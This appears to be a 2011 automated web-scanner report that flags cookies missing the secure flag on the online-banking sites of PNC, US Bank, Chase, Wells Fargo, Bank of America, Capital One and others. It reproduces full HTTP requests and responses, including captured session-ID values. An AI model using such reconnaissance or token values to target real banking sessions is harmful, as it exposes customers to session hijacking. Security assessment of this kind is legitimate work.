GET /webapp/unsec/depositRates/init.app HTTP/1.1 Host: www.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webapp/unsec/homeEquity/init.app HTTP/1.1 Host: www.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.retirementgold.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Cache-Control: private Content-Length: 156 Content-Type: text/html Location: https://www.retirementgold.com/fnbo Set-Cookie: ASPSESSIONIDAAQSTCQQ=GLLJBHGAIDPLDGIHHBMDKOAH; path=/ Date: Wed, 02 Feb 2011 22:20:27 GMT Connection: close
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="https://www.retirementgold.com/fnbo">here</a>.</body>
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pnc/ HTTP/1.1 Host: www.smart-hsa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pnc/ HTTP/1.1 Host: www.smart-hsa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /internetBanking/RequestRouter HTTP/1.1 Host: www4.usbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=21c4f809eecc8bd903c1296676910391:lv=1296676910391:ss=1296676910391; JSESSIONIDRIB07=0000Z-XYgl3TaZe4ANzuha1_G7j:-1; CAMPID="";
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:30:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html;charset=ISO-8859-1 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Content-Language: en-US Content-Length: 7828 Set-Cookie: JSESSIONIDRIB09=0000FrNgyz_FdPFwsTt_iMc_-lN:-1; Path=/internetBanking Server: WebSphere Application Server/6.1
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /internetBanking/RequestRouter?requestCmdId=DisplayLoginPage HTTP/1.1 Host: www4.usbank.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:00:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html;charset=ISO-8859-1 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Content-Language: en-US Set-Cookie: JSESSIONIDRIB07=0000Z-XYgl3TaZe4ANzuha1_G7j:-1; Path=/internetBanking Set-Cookie: CAMPID=""; Expires=Sat, 02 Feb 2041 04:23:43 GMT; Path=/; Domain=.usbank.com Server: WebSphere Application Server/6.1
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /internetBanking/RequestRouter HTTP/1.1 Host: www4.usbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=21c4f809eecc8bd903c1296676910391:lv=1296676910391:ss=1296676910391; JSESSIONIDRIB07=0000Z-XYgl3TaZe4ANzuha1_G7j:-1; CAMPID="";
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 23:45:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html;charset=ISO-8859-1 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Content-Language: en-US Content-Length: 7829 Set-Cookie: JSESSIONIDRIB011=0000QfeDKqBzExihl0t6Sl1rbNV:-1; Path=/internetBanking Server: WebSphere Application Server/6.1
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /internetBanking/en_us/info/BrowserRequirementsOut.jsp HTTP/1.1 Host: www4.usbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=21c4f809eecc8bd903c1296676910391:lv=1296676910391:ss=1296676910391; JSESSIONIDRIB07=0000Z-XYgl3TaZe4ANzuha1_G7j:-1; CAMPID="";
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:30:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html;charset=ISO-8859-1 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Content-Language: en-US Content-Length: 14681 Set-Cookie: JSESSIONIDRIB09=0000K4E52Qoy6PbGS6Z06RA5tSI:-1; Path=/internetBanking Server: WebSphere Application Server/6.1
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /internetBanking/en_us/info/BrowserRequirementsOut.jsp HTTP/1.1 Host: www4.usbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=21c4f809eecc8bd903c1296676910391:lv=1296676910391:ss=1296676910391; JSESSIONIDRIB07=0000Z-XYgl3TaZe4ANzuha1_G7j:-1; CAMPID="";
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 23:45:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html;charset=ISO-8859-1 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Content-Language: en-US Content-Length: 14682 Set-Cookie: JSESSIONIDRIB011=0000ggpvqAphewOgNOFlO8lrK0H:-1; Path=/internetBanking Server: WebSphere Application Server/6.1
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /internetBanking/en_us/info/ContactUsOut.jsp HTTP/1.1 Host: www4.usbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=21c4f809eecc8bd903c1296676910391:lv=1296676910391:ss=1296676910391; JSESSIONIDRIB07=0000Z-XYgl3TaZe4ANzuha1_G7j:-1; CAMPID="";
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 23:45:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html;charset=ISO-8859-1 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Content-Language: en-US Content-Length: 14538 Set-Cookie: JSESSIONIDRIB011=0000AgcxpIllPHFlV7I1C0_htWM:-1; Path=/internetBanking Server: WebSphere Application Server/6.1
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /internetBanking/en_us/info/ContactUsOut.jsp HTTP/1.1 Host: www4.usbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=21c4f809eecc8bd903c1296676910391:lv=1296676910391:ss=1296676910391; JSESSIONIDRIB07=0000Z-XYgl3TaZe4ANzuha1_G7j:-1; CAMPID="";
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:30:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html;charset=ISO-8859-1 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Content-Language: en-US Content-Length: 14537 Set-Cookie: JSESSIONIDRIB09=0000ow2BUtOGja-8V-F7CZsYAu6:-1; Path=/internetBanking Server: WebSphere Application Server/6.1
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /planning/investments.action HTTP/1.1 Host: www6.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and does not have the secure flag set:
v1st=8A02CA39CD9313C4; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /auth/login.aspx HTTP/1.1 Host: chaseonline.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 4559 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: no-cache=Set-Cookie Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: v1st=8A02CA39CD9313C4; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com Date: Wed, 02 Feb 2011 22:02:00 GMT Connection: close
The following cookie was issued by the application and does not have the secure flag set:
v1st=CA1D7D273B8AF772; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /chaseonline/reidentify/sso_reidentify.jsp HTTP/1.1 Host: chaseonline.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Cache-Control: no-cache Pragma: no-cache Content-Length: 167 Content-Type: text/html; charset=utf-8 Expires: -1 Location: /Public/Reidentify/ReidentifyFilterView.aspx Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: no-cache=Set-Cookie Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: v1st=CA1D7D273B8AF772; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com Date: Wed, 02 Feb 2011 22:01:53 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2fPublic%2fReidentify%2fReidentifyFilterView.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
v1st=6C9A73F2B86FE9ED; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /js/Reporting.js HTTP/1.1 Host: chaseonline.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=86400 Content-Length: 70473 Content-Type: application/x-javascript Content-Location: https://chaseonline.chase.com/js/Reporting.js Last-Modified: Mon, 06 Dec 2010 18:24:12 GMT Accept-Ranges: bytes ETag: "02ebcc77295cb1:51e6" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-Control: no-cache=Set-Cookie Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: v1st=6C9A73F2B86FE9ED; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com Date: Wed, 02 Feb 2011 22:01:52 GMT Connection: close
var CHASE=CHASE||{};CHASE.analytics=(function(){var analyticsConfig=new(function Config(){this.Enabled=true;this.PageDotPathSet=false;this.Initialized=false;this.DelayTag=false;this.DebugMode=true;th ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cgi-bin/ifsewwwc?Logon HTTP/1.1 Host: myaccounts.navyfcu.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /signon HTTP/1.1 Host: online.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:02:13 GMT Cache-Control: no-cache="set-cookie" X-Cnection: close Location: https://online.wellsfargo.com/login?LOB=BIZ&ERROR_CODE=ZXJyb3IuY29va2llc05vdEVuYWJsZWQ%3D X-Powered-By: Servlet/2.4 JSP/2.0 Set-Cookie: OB_SO_ORIGIN=source=alternate;path=/;domain=.wellsfargo.com; Set-Cookie: ISD_DAS_COOKIE=Zwt2abN8dLgwD7E5lQAAAAAAA5lwAI7oMlzo4nNgjH5Nn3E7KNFroc2SxeqP8qV8CZgGCvTIC19wEM8=;path=/;domain=.wellsfargo.com; Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://online.wellsfargo.com/logi ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /auth/AuthService HTTP/1.1 Host: onlineservices.wachovia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:02:13 GMT Server: IBM_HTTP_Server Set-Cookie: TLTSID=16FB92962F18102F5856F16EF5F79C09; Path=/; Domain=.wachovia.com Cache-Control: no-store Pragma: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: AuthSvsSessionID=IzW+wP+VVHuq0l/F/NqxgmwCKP0=55 4N.LEInmgXLF30lFrJTXIXXWgrr.1012025; HttpOnly; Path=/; Domain=.wachovia.com; Secure x-frames-option: deny Connection: close Content-Type: text/html Content-Language: en Content-Length: 13099
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!--
The following cookie was issued by the application and does not have the secure flag set:
v1st=2D72E3495D74083; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.cardmemberservices.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /MyAccounts.aspx HTTP/1.1 Host: resources.cardmemberservices.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Cache-Control: no-cache Pragma: no-cache Content-Length: 170 Content-Type: text/html; charset=utf-8 Expires: -1 Location: https://online.cardmemberservices.com/MyAccounts.aspx Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: no-cache=Set-Cookie Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: v1st=2D72E3495D74083; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.cardmemberservices.com Date: Wed, 02 Feb 2011 22:02:19 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://online.cardmemberservices.com/MyAccounts.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
v1st=D5E5B6A166EC8299; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /MyAccounts.aspx HTTP/1.1 Host: resources.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Cache-Control: no-cache Pragma: no-cache Content-Length: 162 Content-Type: text/html; charset=utf-8 Expires: -1 Location: https://chaseonline.chase.com/MyAccounts.aspx Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: no-cache=Set-Cookie Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: v1st=D5E5B6A166EC8299; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com Date: Wed, 02 Feb 2011 22:02:19 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://chaseonline.chase.com/MyAccounts.aspx">here</a>.</h2> </body></html>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /meta HTTP/1.1 Host: s.xp1.ru4.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /meta HTTP/1.1 Host: stg.xp1.ru4.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /c?siteid=429&ccID=BOA_HOME_SIGNON_SERVICE_01&ccID=BOA_HOME_SIGNON_SERVICE_02&ccID=BOA_HOME_SIGNON_SERVICE_03&ccID=BOA_HOME_SIGNON_HERO&location=https%3A%2F%2Fwww.bankofamerica.com%2Fhomepage%2Foverview.go%3FBOA_0020%3D999%26tc_lang%3Den_US%26state%3Dnull%26BA_0021%3Dnull%26BOA_HPR%3Dnull HTTP/1.1 Host: tc.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-control: no-cache, private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Date: Wed, 02 Feb 2011 22:02:37 GMT Last-Modified: Wed, 02 Feb 2011 22:02:37 GMT P3P: policyref="http://www.touchclarity.com/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIa PSAa PSDa OUR STP UNI PUR COM NAV INT STA PRE" Set-Cookie: TCID=0007ae71-99a3-d958-8d17-88470000005a;path=/;domain=bankofamerica.com;expires=Sat, 02-Feb-2013 22:02:37 GMT; Connection: Keep-Alive Content-Length: 563 Content-Type: text/javascript; charset=ISO-8859-1 Set-Cookie: NSC_CbolPgBnfsjdb=445b32097852;expires=Thu, 03-Feb-11 02:02:38 GMT;path=/;domain=bankofamerica.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/lost-password-3.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/partner-portal-home.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /index.php HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /register.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /retirementcenter HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.capitalone.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BIGipServerpl_capitalone.com_443=745088266.65056.0000
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:00:19 GMT Server: Apache Set-Cookie: v1st=FBBE6C4A1C9B8436; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: itc=CAPITALONE11NZZZintmktgD4; expires=Sun, 03-Apr-2011 22:00:19 GMT; path=/; domain=.capitalone.com Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:00:19 GMT; path=/; domain=.capitalone.com Set-Cookie: caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; expires=Fri, 04-Mar-2011 22:00:19 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:00:18 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Keep-Alive: timeout=5, max=50 Connection: Keep-Alive Content-Type: text/html; charset=ISO-8859-1 Content-Length: 39529
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /creditcards/gateway/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 02 Feb 2011 22:12:45 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponecc=channel%3DUNS%2A20090715%3Atestgroup%3Dtg11%2A20110113; path=/; domain=.capitalone.com Set-Cookie: caponesn=f5b8a110S04syM9LTU6OK7YyMrNSCvULtjIyMLA0MDc01S1JNzTUNTIwNAQiYyXrOENTY3NjAA%3D%3D; expires=Wed, 01-Jan-2020 00:00:00 GMT; path=/; domain=.capitalone.com Set-Cookie: LP_GROUP=test; path=/creditcards/; domain=www.capitalone.com Location: http://www.capitalone.com/creditcards/? Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Content-Length: 0 Connection: close Content-Type: text/html; charset=ISO-8859-1
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /indexn.php HTTP/1.1 Host: www.capitalone.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://www.capitalone.c ...[SNIP]...
